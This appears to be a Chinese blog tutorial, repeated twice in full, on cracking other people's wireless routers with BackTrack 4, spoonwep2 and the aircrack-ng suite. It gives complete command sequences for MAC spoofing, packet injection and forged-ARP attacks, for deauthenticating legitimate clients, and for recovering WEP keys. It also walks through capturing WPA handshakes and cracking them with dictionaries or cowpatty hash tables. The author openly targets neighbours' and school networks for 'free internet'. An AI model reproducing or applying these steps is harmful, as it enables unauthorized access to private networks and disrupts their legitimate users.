BT4+spoonwep2破解无线路由器

╭飛雪飄零╮ 电脑评论3,097字数 18143阅读模式

一:启动BT4
首先下载好BT4和spoonwep2
将两者解压,再把解压出来的spoonwep2.lzm放到BT4modules目录中如果你是下载的光盘版就直接刻录成光碟,然后重启电脑的时候选择光盘启动项目,如果你是下载的USB版就直接保存到USB上,启用USB启动,VM版的BT4可能对集成的无线网卡支持不太好,USB无线网卡则支持得很好,启动方法很多,但是都很麻烦,我这里讲一种硬盘启动方法:
BT4(bt4-pre-final版)是基于ubuntu的linux,采用grub方式引导。

一、 准备工作:
1、下载grub4dos软件最新版;
2、下载bt4-pre-final.iso,把bt4-pre-final.iso中的boot、casper
文件夹复制出来放到E盘根目录下。

二、步骤:
1、把grub4dos压缩包解压缩,将grldr、grub.exe、menu.lst三个文件拷入C盘根目录;
2、编辑C盘下的boot.ini,在boot.ini的最后加上一行:
c:grldr="Load GRUB4DOS"。如果boot.ini中的timeout值为零,把它设置为大于0的数字,例如timeout=3,然后保存boot.ini。
3、编辑C盘下的menu.lst
color black/cyan yellow/cyan
timeout 30
default /default
fallback 1
splashimage (hd0,5)/boot/grub/bt4.xpm.gz
title Boot BackTrack 4
kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper
nopersistent rw quiet vga=0x317
initrd (hd0,5)/boot/initrd.gz
title Start windows
rootnoverify (hd0,0)
makeactive
chainloader +1
title Shutdown the Computer
halt
title Reboot the Computer
reboot
可以将原menu.lst里面的内容都删除,写入上述内容,需注意格式。关键的一点是:kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317   此行参考bt4里面的menu.lst,只是添加了(hd0,5),如果bt4放在C盘启动则不需要添加。(hd0,5)的计算是hd0为第一块主硬盘,在grub下逻辑分区从4开始,所以D盘即为4,E盘即为5。重启选择Load GRUB4DOS,再选Boot BackTrack 4,即可启动BT4。此方法bt4将E盘当作cd读取,系统启动后不能识别硬盘其他分区,所在的E盘可读不可写,不知甚原因。
二:破解密码(GUI版)
  通过以上的几种方法皆可启动下载的BT4,之后就需要输入“startx”进入系统了,后进入系统的时候就开始破解了,现在就要去找spoonwep2了,左下角开始的旁边有个黑色的框框,也就是SHELL,点击,输入:spoonwep就可以显示spoonwep2的界面了。

  在各项选项里选择以下操作
         NET CARD  网卡接口   选择 WIFI0
         DRIVER       驱动     选择 NORMAL
         MODE         模式     选择 UNKNOWN  VICTIM 
  然后点击下面的NEXT,接着就会转入VICTMS DISCOVERY界面。

  好了,可以看见VICTMS DISCOVERY界面左面的选项是默认的CHANHOPPING 这个事无线的AP的工作频道,不要动,直接点击右侧的LAUNCH 按钮。  这时会弹出抓包窗口(SCAN),可作为参考,也可不用理会。稍等一会儿,如果能够找到符合要求的信号,会在当前的victims discovery
窗口中显示扫描到的信息,其中:
        ESSID   路由广播名称
        MAC    路由的MAC地址
        CHAN   使用的频道
        POW   信号强度
        DATA  (注意:这个数值一直为0基本无法破解,你可另寻时机等到有DATA再破)
        CLIS   空白代表无客户端,打钩则代表有客户端
  每一行代表一个扫描到的无限AP信号,点击选中你要破解的信号(尽量选择有DATA以及CLIS后有对号的信号进行破解);然后在信号信息框的下面相应的显示出在AP当前的客户端,你可以点击选中一个客户端(这样更容易破解一些),也可以不选。然后点击窗口下边的selectionOK按钮,就会进入attack panel界面。 

  在attack panel界面,攻击模式下拉框中几个选项的区别如下(由客户端建议选择第一项,无客户端建议选择第四项):
    ARP  REPLAY  ATTACK           (有客户端时用,3ARP注入)
    P0841  REPLAY  ATTACK          (第三选择,2交互注入)
    CHOPCHOP  &  FORGEATTACK      (第二选择,4断续注入)
    FRAGMENTATION  &  FORGE ATTACK(首选,5碎片注入)
  
  然后直接点击launch即可是破解,这时同样会在任务栏出现一个新的窗口,你可以用鼠标点击出来看一看,里面会显示一些相关的信息,如信号强度等。大家注意上面图片里有个‘24858 IVS’,其中IVS就是我们要寻找的带有特殊数据包的IVS格式包,我说的抓包其实就是抓的这个IVS包。基本学校里的密钥抓到大概10000IVS就差不多出密码了,如果到了4W还没显示密码的话,我还是劝告童鞋去换个目标吧,这段抓包的时间就去喝喝茶,去看看书吧。因为我们是被动抓的包,所以必须跳个好点,流量大的时间段去破解,因为那时候对方在下迅雷的时候,会飞快的产生IVS包,所以我建议大家在12点半到1点半,晚上九点半到11点半,这两段时间内选择破解,因为是上网的高峰。注意,最后破解出来的密码是在attack panel界面下方显示(而不是在spoonwep dump窗口显示)。 
密码就是:52 15 21 13 14.
然后,重启进入XP系统,选择无线连接里的你刚才破解的那个AP,填上密钥,就能享受免费带来的上网乐趣了。
============================================================
以上是最最最最简便的傻瓜方法,一般都是那样破解的方便也省事儿,但是有的时候,目标AP不会产生大量的IVS包,会对于我们抓包产生非常大的影响,因为本身没有太多的流量产生,我们在通过WIFI的TCP握手的时候产生的有效IVS也会少的可怜,这样对于必须要抓至少10000IVS来说,简直是浪费时间,所以,这时候我们就要化被动为主动的注入,使其多产生相互之间的更多数据交汇,这样针对没有客户的AP或者在空闲的AP来说是非常有效地。

三:手动注入(SHELL代码注入,新手跳过)

   以下主要针对SHELL的代码输入操作,其实SPOONWEP就看做一个界面型的代码整合软件,现在我们要脱离它的帮助,自己去手动注入。还是拿5100网卡做演示(其他的网卡方法大体一致,网上搜更多的资料看看吧)
  
   shell 1:----------------------------------------
1.ifconfig -a
  <wlan0 ... xx:xx:xx:xx:xx:xx>
[
macchanger -m 00:11:22:33:44:55 wlan0
  <修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>
]
2.ifconfig -a wlan0 up
  (5100可能要加载网卡才支持注入?)
3.airmon-ng start wlan0 6
  <monitor mode enabled on mon0>
  (6是频道)
  另一说5100要支持注入用airmon-ng start wlan0
  如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
  <Injection is working/No anwser>(注入攻击成功/不成功)
  (检测你的网卡是否支持注入)
]
4.airodump-ng -w pack -c 6 mon0/wlan0
  (pack是随便起的获取的ivs的保存文件的名字)
  另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0
shell 2:----------------------------------------
一、有客户端:
破解:abcd四种方式
a.合法客户端产生大量有效的数据,能直接获得大量cap。
收到10000以上data后,直接转shell 3,破解密码
b.合法客户端只能产生少量数据,就需要注入<-3>攻击加速产生大量数据。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)
  <Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多类似行>
c.合法客户端不在通信,注入模式不成功,
用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,
新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0
6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0
  (可能要另开窗)
d.有客户端,并且客户端能产生有效arp 数据的另类破解方式
输入modprobe –r iwl3945
  (加载网卡)
输入modprobe ipwraw
输入airmon-ng start wlan0 6
现在,只要一个命令就搞定,输入:
输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。 
<key: 12:34:56:78:90>
二、无客户端:
5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
  (我成功了)
  另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0
  <Authentication successful>
  <Association successful>
  (建立虚拟伪装连接)
  如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)
破解:abcd四种方式
a.-2 crack mode ---------------
  建立虚拟连接后直接用-2交互攻击模式集合了抓包,提数据和发包攻击
6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
发包成功后可得到足够的ivs,然后用aircrack-ng破解
b.-3 crack mode ---------------
6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0
7.用aircrack-ng破解<自己添加的步骤?>
c.-4 crack mode ---------------
  -4攻击模式;制造数据包;-2交互式攻击模式
6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0
  <?yes>
  <Saving keystream in replay_dec-0523-075615.xor>
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp
  (提取上面xor 文件来伪造一个arp包)
8.aireplay-ng -2 -r myarp mon0
  一说用aireplay-ng -2 -r myarp -x 512 mon0
(发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨)
9.用aircrack-ng破解
d.-5 crack mode ---------------
  -5碎片攻击模式;制造数据包;-2交互式攻击模式
  (我成功过)
6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0
  <?yes>
  <Saving keystream in fragment-1216-201426.xor>
  (利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件))
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
  (Myarp随便起的文件名)
  <Wrote packet to: myarp>
8.aireplay-ng -2 -r myarp -x 256/512 mon0
  <?yes>
  (这时,前面的抓包窗口上的data 将迅速增加)
  (512是攻击速度,1024是最大值)
9.采用aircrack-ng 来进行破解
shell 3:----------------------------------------
aircrack-ng *.cap
  如果shell 1用了--ivs 参数,则这里用aircrack-ng *.ivs
  (我成功了)
  另一说用aircrack-ng -n 64 -b APmac pack-01.cap
  <KEY FOUND! [......] <ASCII:XXXXX>>
附:
5100用BT4+spoonwep2破解
1.把spoonwep2放在BT4modules下,启动BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<显示bash为成功,dash为失败>
3.开spoonwep2,里面可以找到网卡了,选wlan0进入搜索,但这时不会搜出来什么,
关闭一下spoonwep2再重启spoonwep2,
这时网卡项里有一个mon0的,选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack,点击launch后就等待密
码的出来(sata数据包到30000个左右)。
(注:论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)
---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a
  <wlan0 ... xx:xx:xx:xx:xx:xx>
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6
  <monitor mode enabled on mon0>
  (6是频道)
4.airodump-ng -w 12345 -c 6 mon0/wlan0
  (保存名为12345.cap)
  (-w:写入文件,-c:截取cap的频道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者输入:aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)
  <18:56:20 Sending 64 directed DeAuth,... 一些类似行>
  (-c后面为合法无线客户端的MAC地址)
  (迫使AP重新与已连接的合法客户端重新握手验证)
  (攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万,
   因为它只要一个包含WPA握手验证包就可以了)
Cap数据包破解:
a.暴力破解
6.aircrack-ng -x -f 2 12345*.cap
  另一说是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典破解
6.aircrack-ng -w password.txt 12345*.cap
  另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
  (
  -w:是字典破解模式
  Password.txt是你事先准备好的字典。
  技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root 下(aircrack 默认
的工作目录在/root)。
  请注意,破解WPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。
   )
c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解
  启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
                  Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...
  <Key Found! [xxxxxxxx]>
d.HASH破解
6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)
  (windows版本操作步骤与其Linux下版本完全一致)
  (
  参数解释:
  -f 这里跟上采用的字典
  -d 生成的Table文件名称
  -s 目标AP的ESSID
   )
7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK
  (
  参数解释:
  -d 导入WPA PMK Hash Table文件名称,下图中为dlink-birth.hash
  -r 事先捕获的WPA握手数据包
  -s 目标AP的ESSID
   )
---------------------end---------------------
WPA破解,怎么知道有握手包被截获?
airodump-ng监视窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65
BT4抓包后,cap文件保存在哪?
输入ls可以看到啊,默认在root下。
如何获得合法端mac?
windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截,Linux可用
Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是,若目标网络采用WEP或者WPA加密的话,有时需先行破解再对数据
包解密方可看到客户端MAC。
前面第一个shell,如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac
BSSID             STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb
如何查找隐藏的SSID?
1.在BT4下先打开一个shell,输入
    airodump-ng 网卡端口
2.打开另一个shell,输入
    aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口
可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止
3.然后就可以在上个shell,看到显示出来的SSID。

最后简单的概括就是以下的八部操作:

1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng --ivs -w name -c 6 ath1
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
-1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 
新的第5步: aireplay-ng   -3   -b ap_mac -h XXXXXXXXXX -x   1024   ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) aircrack-ng -n 64 -b ap_mac name-01.ivs
=================================================================
一:启动BT4
首先下载好BT4和spoonwep2
将两者解压,再把解压出来的spoonwep2.lzm放到BT4modules目录中如果你是下载的光盘版就直接刻录成光碟,然后重启电脑的时候选择光盘启动项目,如果你是下载的USB版就直接保存到USB上,启用USB启动,VM版的BT4可能对集成的无线网卡支持不太好,USB无线网卡则支持得很好,启动方法很多,但是都很麻烦,我这里讲一种硬盘启动方法:
BT4(bt4-pre-final版)是基于ubuntu的linux,采用grub方式引导。

一、 准备工作:
1、下载grub4dos软件最新版;
2、下载bt4-pre-final.iso,把bt4-pre-final.iso中的boot、casper
文件夹复制出来放到E盘根目录下。

二、步骤:
1、把grub4dos压缩包解压缩,将grldr、grub.exe、menu.lst三个文件拷入C盘根目录;
2、编辑C盘下的boot.ini,在boot.ini的最后加上一行:
c:grldr="Load GRUB4DOS"。如果boot.ini中的timeout值为零,把它设置为大于0的数字,例如timeout=3,然后保存boot.ini。
3、编辑C盘下的menu.lst
color black/cyan yellow/cyan
timeout 30
default /default
fallback 1
splashimage (hd0,5)/boot/grub/bt4.xpm.gz
title Boot BackTrack 4
kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper
nopersistent rw quiet vga=0x317
initrd (hd0,5)/boot/initrd.gz
title Start Windows
rootnoverify (hd0,0)
makeactive
chainloader +1
title Shutdown the Computer
halt
title Reboot the Computer
reboot
可以将原menu.lst里面的内容都删除,写入上述内容,需注意格式。关键的一点是:kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317   此行参考bt4里面的menu.lst,只是添加了(hd0,5),如果bt4放在C盘启动则不需要添加。(hd0,5)的计算是hd0为第一块主硬盘,在grub下逻辑分区从4开始,所以D盘即为4,E盘即为5。重启选择Load GRUB4DOS,再选Boot BackTrack 4,即可启动BT4。此方法bt4将E盘当作cd读取,系统启动后不能识别硬盘其他分区,所在的E盘可读不可写,不知甚原因。
二:破解密码(GUI版)
  通过以上的几种方法皆可启动下载的BT4,之后就需要输入“startx”进入系统了,后进入系统的时候就开始破解了,现在就要去找spoonwep2了,左下角开始的旁边有个黑色的框框,也就是SHELL,点击,输入:spoonwep就可以显示spoonwep2的界面了。

  在各项选项里选择以下操作
         NET CARD  网卡接口   选择 WIFI0
         DRIVER       驱动     选择 NORMAL
         MODE         模式     选择 UNKNOWN  VICTIM 
  然后点击下面的NEXT,接着就会转入VICTMS DISCOVERY界面。

  好了,可以看见VICTMS DISCOVERY界面左面的选项是默认的CHANHOPPING 这个事无线的AP的工作频道,不要动,直接点击右侧的LAUNCH 按钮。  这时会弹出抓包窗口(SCAN),可作为参考,也可不用理会。稍等一会儿,如果能够找到符合要求的信号,会在当前的victims discovery
窗口中显示扫描到的信息,其中:
        ESSID   路由广播名称
        MAC    路由的MAC地址
        CHAN   使用的频道
        POW   信号强度
        DATA  (注意:这个数值一直为0基本无法破解,你可另寻时机等到有DATA再破)
        CLIS   空白代表无客户端,打钩则代表有客户端
  每一行代表一个扫描到的无限AP信号,点击选中你要破解的信号(尽量选择有DATA以及CLIS后有对号的信号进行破解);然后在信号信息框的下面相应的显示出在AP当前的客户端,你可以点击选中一个客户端(这样更容易破解一些),也可以不选。然后点击窗口下边的selectionOK按钮,就会进入attack panel界面。 

  在attack panel界面,攻击模式下拉框中几个选项的区别如下(由客户端建议选择第一项,无客户端建议选择第四项):
    ARP  REPLAY  ATTACK           (有客户端时用,3ARP注入)
    P0841  REPLAY  ATTACK          (第三选择,2交互注入)
    CHOPCHOP  &  FORGEATTACK      (第二选择,4断续注入)
    FRAGMENTATION  &  FORGE ATTACK(首选,5碎片注入)
  
  然后直接点击launch即可是破解,这时同样会在任务栏出现一个新的窗口,你可以用鼠标点击出来看一看,里面会显示一些相关的信息,如信号强度等。大家注意上面图片里有个‘24858 IVS’,其中IVS就是我们要寻找的带有特殊数据包的IVS格式包,我说的抓包其实就是抓的这个IVS包。基本学校里的密钥抓到大概10000IVS就差不多出密码了,如果到了4W还没显示密码的话,我还是劝告童鞋去换个目标吧,这段抓包的时间就去喝喝茶,去看看书吧。因为我们是被动抓的包,所以必须跳个好点,流量大的时间段去破解,因为那时候对方在下迅雷的时候,会飞快的产生IVS包,所以我建议大家在12点半到1点半,晚上九点半到11点半,这两段时间内选择破解,因为是上网的高峰。注意,最后破解出来的密码是在attack panel界面下方显示(而不是在spoonwep dump窗口显示)。 
密码就是:52 15 21 13 14.
然后,重启进入XP系统,选择无线连接里的你刚才破解的那个AP,填上密钥,就能享受免费带来的上网乐趣了。
============================================================
以上是最最最最简便的傻瓜方法,一般都是那样破解的方便也省事儿,但是有的时候,目标AP不会产生大量的IVS包,会对于我们抓包产生非常大的影响,因为本身没有太多的流量产生,我们在通过WIFI的TCP握手的时候产生的有效IVS也会少的可怜,这样对于必须要抓至少10000IVS来说,简直是浪费时间,所以,这时候我们就要化被动为主动的注入,使其多产生相互之间的更多数据交汇,这样针对没有客户的AP或者在空闲的AP来说是非常有效地。

三:手动注入(SHELL代码注入,新手跳过)

   以下主要针对SHELL的代码输入操作,其实SPOONWEP就看做一个界面型的代码整合软件,现在我们要脱离它的帮助,自己去手动注入。还是拿5100网卡做演示(其他的网卡方法大体一致,网上搜更多的资料看看吧)
  
   shell 1:----------------------------------------
1.ifconfig -a
  <wlan0 ... xx:xx:xx:xx:xx:xx>
[
macchanger -m 00:11:22:33:44:55 wlan0
  <修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>
]
2.ifconfig -a wlan0 up
  (5100可能要加载网卡才支持注入?)
3.airmon-ng start wlan0 6
  <monitor mode enabled on mon0>
  (6是频道)
  另一说5100要支持注入用airmon-ng start wlan0
  如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
  <Injection is working/No anwser>(注入攻击成功/不成功)
  (检测你的网卡是否支持注入)
]
4.airodump-ng -w pack -c 6 mon0/wlan0
  (pack是随便起的获取的ivs的保存文件的名字)
  另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0
shell 2:----------------------------------------
一、有客户端:
破解:abcd四种方式
a.合法客户端产生大量有效的数据,能直接获得大量cap。
收到10000以上data后,直接转shell 3,破解密码
b.合法客户端只能产生少量数据,就需要注入<-3>攻击加速产生大量数据。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)
  <Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多类似行>
c.合法客户端不在通信,注入模式不成功,
用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,
新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0
6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0
  (可能要另开窗)
d.有客户端,并且客户端能产生有效arp 数据的另类破解方式
输入modprobe –r iwl3945
  (加载网卡)
输入modprobe ipwraw
输入airmon-ng start wlan0 6
现在,只要一个命令就搞定,输入:
输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。 
<key: 12:34:56:78:90>
二、无客户端:
5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
  (我成功了)
  另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0
  <Authentication successful>
  <Association successful>
  (建立虚拟伪装连接)
  如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)
破解:abcd四种方式
a.-2 crack mode ---------------
  建立虚拟连接后直接用-2交互攻击模式集合了抓包,提数据和发包攻击
6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
发包成功后可得到足够的ivs,然后用aircrack-ng破解
b.-3 crack mode ---------------
6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0
7.用aircrack-ng破解<自己添加的步骤?>
c.-4 crack mode ---------------
  -4攻击模式;制造数据包;-2交互式攻击模式
6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0
  <?yes>
  <Saving keystream in replay_dec-0523-075615.xor>
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp
  (提取上面xor 文件来伪造一个arp包)
8.aireplay-ng -2 -r myarp mon0
  一说用aireplay-ng -2 -r myarp -x 512 mon0
(发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨)
9.用aircrack-ng破解
d.-5 crack mode ---------------
  -5碎片攻击模式;制造数据包;-2交互式攻击模式
  (我成功过)
6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0
  <?yes>
  <Saving keystream in fragment-1216-201426.xor>
  (利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件))
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
  (Myarp随便起的文件名)
  <Wrote packet to: myarp>
8.aireplay-ng -2 -r myarp -x 256/512 mon0
  <?yes>
  (这时,前面的抓包窗口上的data 将迅速增加)
  (512是攻击速度,1024是最大值)
9.采用aircrack-ng 来进行破解
shell 3:----------------------------------------
aircrack-ng *.cap
  如果shell 1用了--ivs 参数,则这里用aircrack-ng *.ivs
  (我成功了)
  另一说用aircrack-ng -n 64 -b APmac pack-01.cap
  <KEY FOUND! [......] <ASCII:XXXXX>>
附:
5100用BT4+spoonwep2破解
1.把spoonwep2放在BT4modules下,启动BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<显示bash为成功,dash为失败>
3.开spoonwep2,里面可以找到网卡了,选wlan0进入搜索,但这时不会搜出来什么,
关闭一下spoonwep2再重启spoonwep2,
这时网卡项里有一个mon0的,选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack,点击launch后就等待密
码的出来(sata数据包到30000个左右)。
(注:论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)
---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a
  <wlan0 ... xx:xx:xx:xx:xx:xx>
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6
  <monitor mode enabled on mon0>
  (6是频道)
4.airodump-ng -w 12345 -c 6 mon0/wlan0
  (保存名为12345.cap)
  (-w:写入文件,-c:截取cap的频道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者输入:aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)
  <18:56:20 Sending 64 directed DeAuth,... 一些类似行>
  (-c后面为合法无线客户端的MAC地址)
  (迫使AP重新与已连接的合法客户端重新握手验证)
  (攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万,
   因为它只要一个包含WPA握手验证包就可以了)
Cap数据包破解:
a.暴力破解
6.aircrack-ng -x -f 2 12345*.cap
  另一说是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典破解
6.aircrack-ng -w password.txt 12345*.cap
  另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
  (
  -w:是字典破解模式
  Password.txt是你事先准备好的字典。
  技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root 下(aircrack 默认
的工作目录在/root)。
  请注意,破解WPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。
   )
c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解
  启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
                  Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...
  <Key Found! [xxxxxxxx]>
d.HASH破解
6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)
  (Windows版本操作步骤与其Linux下版本完全一致)
  (
  参数解释:
  -f 这里跟上采用的字典
  -d 生成的Table文件名称
  -s 目标AP的ESSID
   )
7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK
  (
  参数解释:
  -d 导入WPA PMK Hash Table文件名称,下图中为dlink-birth.hash
  -r 事先捕获的WPA握手数据包
  -s 目标AP的ESSID
   )
---------------------end---------------------
WPA破解,怎么知道有握手包被截获?
airodump-ng监视窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65
BT4抓包后,cap文件保存在哪?
输入ls可以看到啊,默认在root下。
如何获得合法端mac?
windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截,Linux可用
Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是,若目标网络采用WEP或者WPA加密的话,有时需先行破解再对数据
包解密方可看到客户端MAC。
前面第一个shell,如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac
BSSID             STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb
如何查找隐藏的SSID?
1.在BT4下先打开一个shell,输入
    airodump-ng 网卡端口
2.打开另一个shell,输入
    aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口
可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止
3.然后就可以在上个shell,看到显示出来的SSID。

最后简单的概括就是以下的八部操作:

1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng --ivs -w name -c 6 ath1
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
-1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 
新的第5步: aireplay-ng   -3   -b ap_mac -h XXXXXXXXXX -x   1024   ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) aircrack-ng -n 64 -b ap_mac name-01.ivs
================================================================= 

继续阅读
 
╭飛雪飄零╮

发表评论